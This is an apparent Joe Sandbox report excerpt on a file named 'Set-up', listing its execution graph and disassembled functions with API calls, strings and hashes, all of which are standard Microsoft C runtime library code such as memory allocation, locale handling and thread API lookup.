                                                                                              execution_graph 23792 6bb6a9b4 DecodePointer EncodePointer 23793 6bb775b1 79 API calls 2 library calls 23795 6bb6afbc EncodePointer GetCurrentThread GetThreadTimes 23801 6bb781a1 185 API calls 11 library calls 23806 6bb71196 97 API calls ___mbtow_environ 23807 6bb64b95 111 API calls 9 library calls 23808 6bb72f94 92 API calls __fread_nolock 23809 6bb54390 78 API calls ___libm_error_support 23811 6bb52f92 RtlUnwind 23812 6bb99191 81 API calls 3 library calls 23814 6bb98b95 219 API calls ctype 23816 6bb67f6a 86 API calls 3 library calls 23817 6bb6cd87 94 API calls 4 library calls 23818 6bb9998b 10 API calls 2 library calls 23819 6bb53180 79 API calls 23822 6bb99581 223 API calls 2 library calls 23824 6bb97384 201 API calls 3 library calls 23826 6bb715f6 80 API calls 3 library calls 23827 6bb61bf5 78 API calls __fassign 23831 6bb77df0 80 API calls 23832 6bb729fe 81 API calls 4 library calls 23836 6bb6a7fb 83 API calls 3 library calls 23843 6bb993e1 TlsSetValue WaitForSingleObject 23844 6bb6a1ec _wtof_l 23845 6bb723ec 100 API calls 3 library calls 23847 6bb989d8 EnterCriticalSection LeaveCriticalSection 23851 6bb63dd0 110 API calls 12 library calls 23855 6bb52fd8 _global_unwind2 _longjmp 23857 6bb705c5 93 API calls __whiteout 23858 6bb717c4 80 API calls 2 library calls 23859 6bb63bc0 79 API calls ___wdtoxmode 23860 6bb623cc 78 API calls 2 library calls 23863 6bb6a934 80 API calls 3 library calls 23864 6bb6ff34 99 API calls 2 library calls 23865 6bb9933a 139 API calls 2 library calls 23875 6bb73724 99 API calls __fassign 23876 6bb76d24 85 API calls 4 library calls 23877 6bbaef22 83 API calls 3 library calls 23879 6bb77b2c 80 API calls __CreateFrameInfo 23881 6bb97d24 RaiseException CreateTimerQueue GetLastError DeleteTimerQueueTimer ctype 23883 6bb71424 82 API calls 3 library calls 23885 6bba5111 201 API calls ctype 23887 6bb97317 228 API calls 3 library calls 23889 6bb99f09 229 API calls 5 library calls 23892 6bb67f02 85 API calls 3 library calls 23894 6bb95b00 TlsGetValue 23899 6bb742b1 5 API calls 9 library calls 23900 6bb62d79 98 API calls _vswprintf_s 23903 6bb9ab6f 201 API calls ctype 23904 6bb99560 215 API calls ctype 23905 6bb5ff6e 77 API calls type_info::_Type_info_dtor 23910 6bb6bb5c 78 API calls __ExceptionPtr::__ExceptionPtr 23914 6bb9874f 150 API calls 3 library calls 23916 6bb77949 79 API calls 2 library calls 23917 6bb622b4 82 API calls 2 library calls 23919 6bb966bc 95 API calls 23920 6bbc32bb 82 API calls 3 library calls 23922 6bb63cbd GetSystemTimeAsFileTime __aulldiv 23923 6bb996b5 79 API calls 3 library calls 23924 6bb704ba 79 API calls __fassign 23925 6bb9b4b7 ?lock_read@reader_writer_lock@Concurrency@ 23926 6bb512cc 96 API calls 7 library calls 23930 6bb6d2ab 92 API calls 23931 6bb5f6a8 _global_unwind2 __DestructExceptionObject VirtualQuery _longjmp _CallDestructExceptionObject 23932 6bb750a8 _isalnum_l 23936 6bb9609f Sleep ctype 23938 6bb53280 80 API calls 23941 6bb9aa82 GetCurrentThreadId Concurrency::details::_ReentrantLock::_Acquire 23942 6bb6f08d 86 API calls 2 library calls 23944 6bb6ca89 78 API calls __lseeki64 23945 6bb98c86 80 API calls 3 library calls 23946 6bb972f9 172 API calls ctype 23709 6bb620fc 23710 6bb6bd90 23709->23710 23711 6bb6210b 23709->23711 23770 6bb6bd9a GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 23710->23770 23716 6bb6203f 23711->23716 23714 6bb62116 23715 6bb6bd95 23715->23715 23717 6bb6204b ___BuildCatchObjectHelper 23716->23717 23718 6bb62057 23717->23718 23719 6bb6b235 23717->23719 23720 6bb78065 23718->23720 23721 6bb62061 23718->23721 23771 6bb6ad05 HeapCreate 23719->23771 23726 6bb87448 _cexit 23720->23726 23727 6bb78082 23720->23727 23742 6bb7809c 23720->23742 23723 6bb625a7 23721->23723 23724 6bb6206a 23721->23724 23739 6bb620d1 ___BuildCatchObjectHelper 23723->23739 23775 6bb62539 82 API calls __freeptd 23723->23775 23772 6bb6067b TlsGetValue DecodePointer TlsSetValue 23724->23772 23725 6bb6b23a 23729 6bb6b242 23725->23729 23725->23742 23735 6bb87452 23726->23735 23782 6bb77ffb _initterm _initterm 23727->23782 23776 6bb6b398 97 API calls 3 library calls 23729->23776 23731 6bb6206f TlsGetValue 23741 6bb62083 23731->23741 23734 6bb78087 23734->23735 23738 6bb78090 23734->23738 23787 6bbd6ca8 78 API calls ___free_lconv_mon 23735->23787 23737 6bb6b247 23737->23742 23777 6bb6ad86 84 API calls __cwild 23737->23777 23783 6bb780a1 81 API calls 23738->23783 23739->23714 23741->23739 23746 6bb62087 23741->23746 23784 6bbd6ca8 78 API calls ___free_lconv_mon 23742->23784 23785 6bbd65ea HeapDestroy 23742->23785 23786 6bbac4bd 81 API calls ___free_lconv_mon 23742->23786 23745 6bb87457 23788 6bbac4bd 81 API calls ___free_lconv_mon 23745->23788 23773 6bb61ee1 77 API calls __cwild 23746->23773 23749 6bb6b254 23749->23742 23778 6bb6aeae 82 API calls 2 library calls 23749->23778 23752 6bb8745c 23789 6bbd65ea HeapDestroy 23752->23789 23753 6bb62093 23753->23742 23756 6bb6209f DecodePointer 23753->23756 23760 6bb620b4 23756->23760 23757 6bb6b261 GetCommandLineA GetCommandLineW 23779 6bb6b22a _setmbcp 23757->23779 23758 6bb87461 23790 6bb6014e 77 API calls 2 library calls 23758->23790 23760->23758 23762 6bb620bc 23760->23762 23761 6bb6b281 23780 6bb6b2a9 77 API calls 5 library calls 23761->23780 23774 6bb6215f 77 API calls 3 library calls 23762->23774 23766 6bb6b286 23766->23742 23781 6bb6b976 89 API calls ctype 23766->23781 23767 6bb620c3 GetCurrentThreadId 23767->23739 23769 6bb6b295 23769->23720 23769->23742 23770->23715 23771->23725 23772->23731 23773->23753 23774->23767 23775->23739 23776->23737 23777->23749 23778->23757 23779->23761 23780->23766 23781->23769 23782->23734 23783->23742 23784->23742 23785->23742 23786->23742 23787->23745 23788->23752 23789->23758 23790->23742 23955 6bb9fae0 InterlockedFlushSList InterlockedFlushSList ctype 23959 6bb990e6 139 API calls 3 library calls 23961 6bb642de 79 API calls 3 library calls 23963 6bb6a8df 99 API calls 5 library calls 23964 6bb602dc GetStringTypeW __whiteout 23965 6bb63cf6 106 API calls 6 library calls 23969 6bb70ac7 92 API calls 8 library calls 23970 6bb9bcc9 89 API calls 3 library calls 23971 8559f4 5 API calls ___security_init_cookie 23973 6bb710c4 100 API calls _vfwprintf 23974 6bb726c3 111 API calls 10 library calls 23661 6bb602c1 23663 6bb602c9 23661->23663 23664 6bb602da 23663->23664 23668 6bb8f2be std::exception::exception 23663->23668 23677 6bb60233 23663->23677 23695 6bbab7af DecodePointer 23663->23695 23666 6bb8f2fc 23697 6bb6b719 77 API calls std::exception::exception 23666->23697 23668->23666 23696 6bb6ba94 87 API calls ctype 23668->23696 23669 6bb8f306 23698 6bb777d4 RaiseException 23669->23698 23672 6bb8f317 23676 6bb602a9 23672->23676 23699 6bb607b5 77 API calls _raise 23672->23699 23674 6bb8f326 23674->23676 23700 6bb607b5 77 API calls _raise 23674->23700 23687 6bb60245 23677->23687 23694 6bb8f270 23677->23694 23679 6bb8f27d 23708 6bb607b5 77 API calls _raise 23679->23708 23682 6bb8f283 23683 6bb6025a RtlAllocateHeap 23684 6bb60273 23683->23684 23683->23687 23684->23663 23686 6bb8f264 23705 6bb607b5 77 API calls _raise 23686->23705 23687->23683 23687->23686 23691 6bb8f269 23687->23691 23692 6bb8f22f 23687->23692 23704 6bbab7af DecodePointer 23687->23704 23706 6bb607b5 77 API calls _raise 23691->23706 23692->23687 23701 6bbac3cc 77 API calls __NMSG_WRITE 23692->23701 23702 6bbac1d8 77 API calls 6 library calls 23692->23702 23703 6bb77eac GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 23692->23703 23707 6bbab7af DecodePointer 23694->23707 23695->23663 23696->23666 23697->23669 23698->23672 23699->23674 23700->23676 23701->23692 23702->23692 23704->23687 23705->23691 23706->23694 23707->23679 23708->23682 23978 6bb9d0c1 162 API calls 2 library calls 23979 6bb6fecf 80 API calls 2 library calls 23980 6bb71ccb _atof_l 23981 6bb71435 88 API calls ctype 23982 6bb61635 100 API calls 2 library calls 23985 6bb6c830 138 API calls 3 library calls 23986 6bbb0630 83 API calls 3 library calls 23988 6bb9d229 160 API calls 23989 6bb98e28 89 API calls ctype 23998 6bb9921f 79 API calls 3 library calls 23999 6bb6ac1e 95 API calls 7 library calls 24000 6bb96214 200 API calls ctype 24008 6bb6bc0a 82 API calls 4 library calls 24011 6bb9f269 99 API calls 24015 6bb61e61 81 API calls 4 library calls 24018 6bbd8664 82 API calls 3 library calls 24019 6bb6d06d 80 API calls __isprint_l 24020 6bb71868 80 API calls 3 library calls 24031 6bb72b26 79 API calls __dosmaperr 24032 6bb95c48 210 API calls 3 library calls 24034 6bba504e 201 API calls 2 library calls 24035 6bb9c84d EnterCriticalSection LeaveCriticalSection SetEvent 24039 6bb7504d 83 API calls __strlwr_s_l 24041 6bb9c644 169 API calls 2 library calls

                                                                                              Executed Functions

                                                                                              Function 6BB602C1 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 53COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • malloc.MSVCR100(?), ref: 6BB602CC
                                                                                                • Part of subcall function 6BB60233: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6BB60CEA,00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7), ref: 6BB60263
                                                                                              • _callnewh.MSVCR100(?), ref: 6BB8F2B0
                                                                                              • std::exception::exception.LIBCMT(?,00000001), ref: 6BB8F2E7
                                                                                              • atexit.MSVCR100(6BBFFC34,?,00000001), ref: 6BB8F2F7
                                                                                              • std::exception::exception.LIBCMT(6BC07580), ref: 6BB8F301
                                                                                              • _CxxThrowException.MSVCR100(?,6BB6BDD8,6BC07580), ref: 6BB8F312
                                                                                              • _errno.MSVCR100 ref: 6BB8F321
                                                                                              • _errno.MSVCR100 ref: 6BB8F32E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errnostd::exception::exception$AllocateExceptionHeapThrow_callnewhatexitmalloc
                                                                                              • String ID: bad allocation
                                                                                              • API String ID: 903262172-2104205924
                                                                                              • Opcode ID: 99154cb0b59ed6009591a82716f68f58311ea221241410986b03747919e4aa3f
                                                                                              • Instruction ID: 06e1a486cb5e64fc0edb330672b342f087aae96a2fedb1b9e5113cb4453c5dee
                                                                                              • Opcode Fuzzy Hash: 99154cb0b59ed6009591a82716f68f58311ea221241410986b03747919e4aa3f
                                                                                              • Instruction Fuzzy Hash: DC018075901699AACB19DB76C88269D7BB4EF412C8F540499E820E6180FF798E01EBA0
                                                                                              Function 6BB60233 Relevance: 12.1, APIs: 8, Instructions: 60memoryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6BB60CEA,00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7), ref: 6BB60263
                                                                                              • __FF_MSGBANNER.LIBCMT ref: 6BB8F22F
                                                                                              • __NMSG_WRITE.LIBCMT ref: 6BB8F236
                                                                                              • _callnewh.MSVCR100(00000001,00000001,00000000,00000000,?,6BB60CEA,00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7,00000001), ref: 6BB8F255
                                                                                              • _callnewh.MSVCR100(00000001,00000000,?,6BB60CEA,00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7,00000001,00000001), ref: 6BB8F278
                                                                                              • _errno.MSVCR100(00000000,?,6BB60CEA,00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9), ref: 6BB8F27E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _callnewh$AllocateHeap_errno
                                                                                              • String ID:
                                                                                              • API String ID: 4160251224-0
                                                                                              • Opcode ID: af838b61b91670ad9c713365cd85bbdd80e426fa3e66175bf958d86046ef5f5b
                                                                                              • Instruction ID: 9ea92a192e9619e1a021fff4825dad19e8d71ba8dd4b7b91ffc9539332bd07cb
                                                                                              • Opcode Fuzzy Hash: af838b61b91670ad9c713365cd85bbdd80e426fa3e66175bf958d86046ef5f5b
                                                                                              • Instruction Fuzzy Hash: 9C017935248BC29AE6122E76DC81B2E3798DF96794F510575B5248D190EF7DCC408E71

                                                                                              Non-executed Functions

                                                                                              Function 6BB7457E Relevance: 99.1, APIs: 42, Strings: 14, Instructions: 1146COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Name::operator+$NameName::$Decorator::getThisType
                                                                                              • String ID: [thunk]:$`adjustor{$`local static destructor helper'$`template static data member constructor helper'$`template static data member destructor helper'$`vtordispex{$`vtordisp{$extern "C" $private: $protected: $public: $static $virtual $}'
                                                                                              • API String ID: 1425277612-3028518216
                                                                                              • Opcode ID: c2fb77bcdd5993d6a662db6ecfdb38c43871c1f67b3499097b9d586e2c5d6e46
                                                                                              • Instruction ID: 3f90fa265a66241a7374bb06a454bc6a93bbd83faf680b06a8b3c41c0e5df8f5
                                                                                              • Opcode Fuzzy Hash: c2fb77bcdd5993d6a662db6ecfdb38c43871c1f67b3499097b9d586e2c5d6e46
                                                                                              • Instruction Fuzzy Hash: 34828D72E602899BEF15DEA8D881BEDB7B5EF48345F14017AE521E7280EB3CD945CB10
                                                                                              Function 6BBAA3DD Relevance: 98.2, APIs: 38, Strings: 18, Instructions: 204libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 457 6bbaa3dd-6bbaa406 GetModuleHandleW GetProcAddress 458 6bbaa408-6bbaa410 GetLastError 457->458 459 6bbaa433-6bbaa44e GetModuleHandleW GetProcAddress 457->459 460 6bbaa41c-6bbaa42e call 6bb98080 call 6bb777d4 458->460 461 6bbaa412-6bbaa417 458->461 462 6bbaa45c-6bbaa477 GetModuleHandleW GetProcAddress 459->462 463 6bbaa450-6bbaa458 GetLastError 459->463 460->459 461->460 462->463 466 6bbaa479-6bbaa494 GetModuleHandleW GetProcAddress 462->466 463->461 465 6bbaa45a 463->465 465->460 466->463 468 6bbaa496-6bbaa4b1 GetModuleHandleW GetProcAddress 466->468 468->463 470 6bbaa4b3-6bbaa4ce GetModuleHandleW GetProcAddress 468->470 470->463 471 6bbaa4d0-6bbaa4eb GetModuleHandleW GetProcAddress 470->471 471->463 472 6bbaa4f1-6bbaa50c GetModuleHandleW GetProcAddress 471->472 472->463 473 6bbaa512-6bbaa52d GetModuleHandleW GetProcAddress 472->473 473->463 474 6bbaa533-6bbaa54e GetModuleHandleW GetProcAddress 473->474 474->463 475 6bbaa554-6bbaa56f GetModuleHandleW GetProcAddress 474->475 475->463 476 6bbaa575-6bbaa590 GetModuleHandleW GetProcAddress 475->476 476->463 477 6bbaa596-6bbaa5b1 GetModuleHandleW GetProcAddress 476->477 477->463 478 6bbaa5b7-6bbaa5d2 GetModuleHandleW GetProcAddress 477->478 478->463 479 6bbaa5d8-6bbaa5f3 GetModuleHandleW GetProcAddress 478->479 479->463 480 6bbaa5f9-6bbaa614 GetModuleHandleW GetProcAddress 479->480 480->463 481 6bbaa61a-6bbaa635 GetModuleHandleW GetProcAddress 480->481 481->463 482 6bbaa63b-6bbaa654 481->482
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,CreateUmsCompletionList,00000000,00000114,00000000,?,?,?,?,6BB9BFE9), ref: 6BBAA3F9
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA402
                                                                                              • GetLastError.KERNEL32(?,?,?,?,6BB9BFE9), ref: 6BBAA408
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,6BB9BFE9), ref: 6BBAA420
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000,?,?,?,?,6BB9BFE9), ref: 6BBAA42E
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,DequeueUmsCompletionListItems,?,?,?,?,6BB9BFE9), ref: 6BBAA447
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA44A
                                                                                              • GetLastError.KERNEL32(?,?,?,?,6BB9BFE9), ref: 6BBAA450
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetUmsCompletionListEvent,?,?,?,?,6BB9BFE9), ref: 6BBAA470
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA473
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,ExecuteUmsThread,?,?,?,?,6BB9BFE9), ref: 6BBAA48D
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA490
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,UmsThreadYield,?,?,?,?,6BB9BFE9), ref: 6BBAA4AA
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA4AD
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,DeleteUmsCompletionList,?,?,?,?,6BB9BFE9), ref: 6BBAA4C7
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA4CA
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentUmsThread,?,?,?,?,6BB9BFE9), ref: 6BBAA4E4
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA4E7
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetNextUmsListItem,?,?,?,?,6BB9BFE9), ref: 6BBAA505
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA508
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,QueryUmsThreadInformation,?,?,?,?,6BB9BFE9), ref: 6BBAA526
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA529
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,SetUmsThreadInformation,?,?,?,?,6BB9BFE9), ref: 6BBAA547
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA54A
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,DeleteUmsThreadContext,?,?,?,?,6BB9BFE9), ref: 6BBAA568
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA56B
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,CreateUmsThreadContext,?,?,?,?,6BB9BFE9), ref: 6BBAA589
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA58C
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,EnterUmsSchedulingMode,?,?,?,?,6BB9BFE9), ref: 6BBAA5AA
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA5AD
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,CreateRemoteThreadEx,?,?,?,?,6BB9BFE9), ref: 6BBAA5CB
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA5CE
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,InitializeProcThreadAttributeList,?,?,?,?,6BB9BFE9), ref: 6BBAA5EC
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA5EF
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,UpdateProcThreadAttribute,?,?,?,?,6BB9BFE9), ref: 6BBAA60D
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA610
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,DeleteProcThreadAttributeList,?,?,?,?,6BB9BFE9), ref: 6BBAA62E
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BBAA631
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionThrow
                                                                                              • String ID: CreateRemoteThreadEx$CreateUmsCompletionList$CreateUmsThreadContext$DeleteProcThreadAttributeList$DeleteUmsCompletionList$DeleteUmsThreadContext$DequeueUmsCompletionListItems$EnterUmsSchedulingMode$ExecuteUmsThread$GetCurrentUmsThread$GetNextUmsListItem$GetUmsCompletionListEvent$InitializeProcThreadAttributeList$QueryUmsThreadInformation$SetUmsThreadInformation$UmsThreadYield$UpdateProcThreadAttribute$kernel32.dll
                                                                                              • API String ID: 1483908321-2643937717
                                                                                              • Opcode ID: 83541c4beb39d2775b9aafd13d83a1ecc309512afd5109a8ec9805731a819a5c
                                                                                              • Instruction ID: b28317abf00fb86549272b847fd1654502bbf231421f431e57a0d18b4ba4c531
                                                                                              • Opcode Fuzzy Hash: 83541c4beb39d2775b9aafd13d83a1ecc309512afd5109a8ec9805731a819a5c
                                                                                              • Instruction Fuzzy Hash: EC5125B5E082966A9F58AF758D59D3B3EFDFA85680306056FA426C3144EE3ED900CF70
                                                                                              Function 6BB67270 Relevance: 86.2, APIs: 18, Strings: 31, Instructions: 416COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 483 6bb67270-6bb67288 call 6bb606c7 486 6bb6728e-6bb67298 483->486 487 6bb917b4 483->487 488 6bb672a3-6bb672ab 486->488 489 6bb6729a-6bb6729d 486->489 490 6bb917c0-6bb917d0 call 6bbdee72 487->490 491 6bb672b6-6bb672ba 488->491 492 6bb672ad-6bb672b0 488->492 489->488 489->490 490->488 495 6bb672c5-6bb672d5 GetUserDefaultLCID 491->495 496 6bb672bc-6bb672bf 491->496 492->491 494 6bb917d5-6bb917d9 492->494 499 6bb917e9-6bb917eb call 6bbdf356 494->499 500 6bb917db-6bb917de 494->500 501 6bb672d8-6bb672dc 495->501 496->495 498 6bb91835-6bb91858 call 6bb528e0 EnumSystemLocalesA 496->498 498->501 514 6bb9185e-6bb91862 498->514 511 6bb917f0-6bb917f4 499->511 500->499 502 6bb917e0-6bb917e7 call 6bbdf2ef 500->502 503 6bb672e2-6bb672fc call 6bb673b4 501->503 504 6bb673b0-6bb673b2 501->504 502->511 503->504 516 6bb67302-6bb67308 503->516 509 6bb673ab-6bb673af 504->509 511->503 515 6bb917fa-6bb9180c call 6bbdee72 511->515 514->501 515->501 520 6bb91812-6bb91816 515->520 516->504 518 6bb6730e-6bb67314 516->518 518->504 521 6bb6731a-6bb67326 IsValidCodePage 518->521 522 6bb91829-6bb91830 call 6bbdf356 520->522 523 6bb91818-6bb9181b 520->523 521->504 524 6bb6732c-6bb67339 IsValidLocale 521->524 522->501 523->522 525 6bb9181d-6bb91824 call 6bbdf2ef 523->525 524->504 527 6bb6733b-6bb67340 524->527 525->501 530 6bb67355-6bb6735a 527->530 531 6bb67342-6bb67351 527->531 532 6bb6735c-6bb6736a 530->532 533 6bb673a8-6bb673aa 530->533 531->530 535 6bb67370-6bb6737f GetLocaleInfoA 532->535 536 6bb91867-6bb91879 call 6bb62c05 532->536 533->509 535->504 537 6bb67381-6bb67393 GetLocaleInfoA 535->537 536->537 542 6bb9187f-6bb91881 536->542 537->504 539 6bb67395-6bb673a5 call 6bb67248 537->539 539->533 543 6bb91886 call 6bbdae5c 542->543 545 6bb9188b-6bb91b52 543->545 546 6bb91bcb-6bb91bce 545->546 547 6bb91b54-6bb91b60 545->547 549 6bb91b62-6bb91b69 547->549 550 6bb91b6b-6bb91b6d 549->550 551 6bb91b73-6bb91b7e 549->551 550->551 552 6bb7216e-6bb72171 550->552 554 6bb72173-6bb72182 552->554 555 6bb72159-6bb72168 call 6bb7212d 552->555 555->549 555->552
                                                                                              APIs
                                                                                              • _getptd.MSVCR100(00000083,00000001,000000BC,?,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB67278
                                                                                              • GetUserDefaultLCID.KERNEL32(00000083,00000001,000000BC,?,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB672CC
                                                                                              • IsValidCodePage.KERNEL32(00000000,?,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB6731E
                                                                                              • IsValidLocale.KERNEL32(?,00000001,?,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB67331
                                                                                              • GetLocaleInfoA.KERNEL32(?,00001001,?,00000040,?,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB6737B
                                                                                              • GetLocaleInfoA.KERNEL32(?,00001002,?,00000040,00000000,00000000,00000005), ref: 6BB6738F
                                                                                              • _itoa_s.MSVCR100(00000010,?,00000010,0000000A), ref: 6BB673A0
                                                                                              • _TranslateName.LIBCMT ref: 6BB917C8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locale$InfoValid$CodeDefaultNamePageTranslateUser_getptd_itoa_s
                                                                                              • String ID: Norwegian-Nynorsk$kCHT$kDES$kENA$kENA$kENB$kENC$kENC$kENI$kENL$kENU$kENU$kENU$kENU$kENU$kESC$kESO$kESU$kESV$kFRB$kFRC$kGBR$kKOR$kNLB$kNLB$kSVF$kSVK$kTTO$kUSA$kUSA$kZAF
                                                                                              • API String ID: 3958957854-1521886187
                                                                                              • Opcode ID: f678da44c95a2cedfca429e82b3d51cbcd4e32932695cfabb67076ee5246cc4d
                                                                                              • Instruction ID: e40e8559f912b81dccbca0fbc1e502a9619d25e0212857dc48f19691d791b0f1
                                                                                              • Opcode Fuzzy Hash: f678da44c95a2cedfca429e82b3d51cbcd4e32932695cfabb67076ee5246cc4d
